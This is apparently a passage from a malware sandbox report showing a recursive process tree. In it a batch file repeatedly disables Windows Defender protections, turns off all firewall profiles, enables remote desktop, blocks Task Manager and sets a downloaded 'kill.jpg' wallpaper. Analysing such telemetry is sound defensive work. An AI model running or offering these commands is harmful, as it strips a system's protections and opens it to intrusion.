                                                                    • Modifies registry class
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4088
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                      9⤵
                                                                        PID:2160
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                          10⤵
                                                                            PID:4268
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                            10⤵
                                                                              PID:3104
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                              10⤵
                                                                                PID:4412
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                10⤵
                                                                                  PID:4636
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                  10⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2944
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                  10⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4352
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                  10⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2000
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                  10⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2552
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                  10⤵
                                                                                    PID:4588
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh firewall set opmode disable
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:2624
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh firewall set opmode mode=DISABLE
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:2768
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set currentprofile state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:4440
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set domainprofile state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:3912
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set privateprofile state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:2764
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set publicprofile state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:1040
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set allprofiles state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:2452
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1084
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                    10⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:780
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3596
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3768
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:652
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4236
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                    10⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5080
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                    10⤵
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2972
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                      11⤵
                                                                                        PID:3916
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                          12⤵
                                                                                            PID:3132
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                            12⤵
                                                                                              PID:4956
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                              12⤵
                                                                                                PID:2944
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                12⤵
                                                                                                  PID:904
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4412
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                  12⤵
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1796
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3120
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5020
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                  12⤵
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3768
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh firewall set opmode disable
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:2644
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh firewall set opmode mode=DISABLE
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:1316
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set currentprofile state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:960
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set domainprofile state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:836
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set privateprofile state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:2252
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set publicprofile state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:2440
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set allprofiles state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:1084
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:652
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1408
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                  12⤵
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1168
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  PID:888
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                  12⤵
                                                                                                    PID:1724
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                    12⤵
                                                                                                      PID:3288
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                      12⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:2312
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                                      12⤵
                                                                                                      • Modifies registry class
                                                                                                      PID:4576
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                                        13⤵
                                                                                                          PID:568
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                            14⤵
                                                                                                              PID:2220
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                              14⤵
                                                                                                                PID:3288
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                                14⤵
                                                                                                                  PID:1736
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                                  14⤵
                                                                                                                    PID:2952
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                    14⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:2552
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                    14⤵
                                                                                                                      PID:2440
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                      14⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      PID:3436
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                      14⤵
                                                                                                                        PID:4352
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                        14⤵
                                                                                                                          PID:3364
                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                          netsh firewall set opmode disable
                                                                                                                          14⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          PID:2000
                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                          netsh firewall set opmode mode=DISABLE
                                                                                                                          14⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          PID:2368
                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                          netsh advfirewall set currentprofile state off
                                                                                                                          14⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          PID:4876
                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                          netsh advfirewall set domainprofile state off
                                                                                                                          14⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          PID:5044
                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                          netsh advfirewall set privateprofile state off
                                                                                                                          14⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          PID:3648
                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                          netsh advfirewall set publicprofile state off
                                                                                                                          14⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          PID:4352
                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                          netsh advfirewall set allprofiles state off
                                                                                                                          14⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          PID:3460
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                          14⤵
                                                                                                                            PID:2072
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                            14⤵
                                                                                                                              PID:1408
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                              14⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:3056
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                              14⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:4008
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                              14⤵
                                                                                                                                PID:4576
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                14⤵
                                                                                                                                  PID:3564
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                                                  14⤵
                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  PID:3916
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                                                                  14⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:836
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                                                                    15⤵
                                                                                                                                      PID:4488
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                                                        16⤵
                                                                                                                                          PID:1648
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                                                          16⤵
                                                                                                                                            PID:3068
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                                                            16⤵
                                                                                                                                              PID:1316
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                                                              16⤵
                                                                                                                                                PID:936
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                16⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:4888
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                16⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:1648
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                16⤵
                                                                                                                                                  PID:1988
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                  16⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  PID:568
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                  16⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  PID:1168
                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                  netsh firewall set opmode disable
                                                                                                                                                  16⤵
                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                  PID:1512
                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                  netsh firewall set opmode mode=DISABLE
                                                                                                                                                  16⤵
                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                  PID:1096
                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                  netsh advfirewall set currentprofile state off
                                                                                                                                                  16⤵
                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                  PID:2072
                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                  netsh advfirewall set domainprofile state off
                                                                                                                                                  16⤵
                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                  PID:3288
                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                  netsh advfirewall set privateprofile state off
                                                                                                                                                  16⤵
                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                  PID:4636
                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                  netsh advfirewall set publicprofile state off
                                                                                                                                                  16⤵
                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                  PID:1484
                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                  netsh advfirewall set allprofiles state off
                                                                                                                                                  16⤵
                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                  PID:4584
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                                  16⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  PID:2040
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                  16⤵
                                                                                                                                                    PID:4936
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                    16⤵
                                                                                                                                                      PID:2072
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                      16⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      PID:1008
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                      16⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      PID:904
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                      16⤵
                                                                                                                                                        PID:3684
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                                                                        16⤵
                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:3340
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                                                                                        16⤵
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        PID:3288
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                                                                                          17⤵
                                                                                                                                                            PID:3304
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              18⤵
                                                                                                                                                                PID:4584
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                                                                                18⤵
                                                                                                                                                                  PID:2484
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                                                                                  18⤵
                                                                                                                                                                    PID:4664
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                                                                                    18⤵
                                                                                                                                                                      PID:3088
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                                                                                      18⤵
                                                                                                                                                                        PID:2636
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                        18⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:1448
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                        18⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:1168
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                        18⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:888
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                        18⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:3600
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                        18⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:4648
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                                                                                    16⤵
                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:2160
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                    16⤵
                                                                                                                                                                    • Sets desktop wallpaper using registry
                                                                                                                                                                    PID:1784
                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                    16⤵
                                                                                                                                                                      PID:3120
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                                                                                  14⤵
                                                                                                                                                                    PID:1512
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                    14⤵
                                                                                                                                                                    • Sets desktop wallpaper using registry
                                                                                                                                                                    PID:1040
                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                    14⤵
                                                                                                                                                                      PID:4956
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
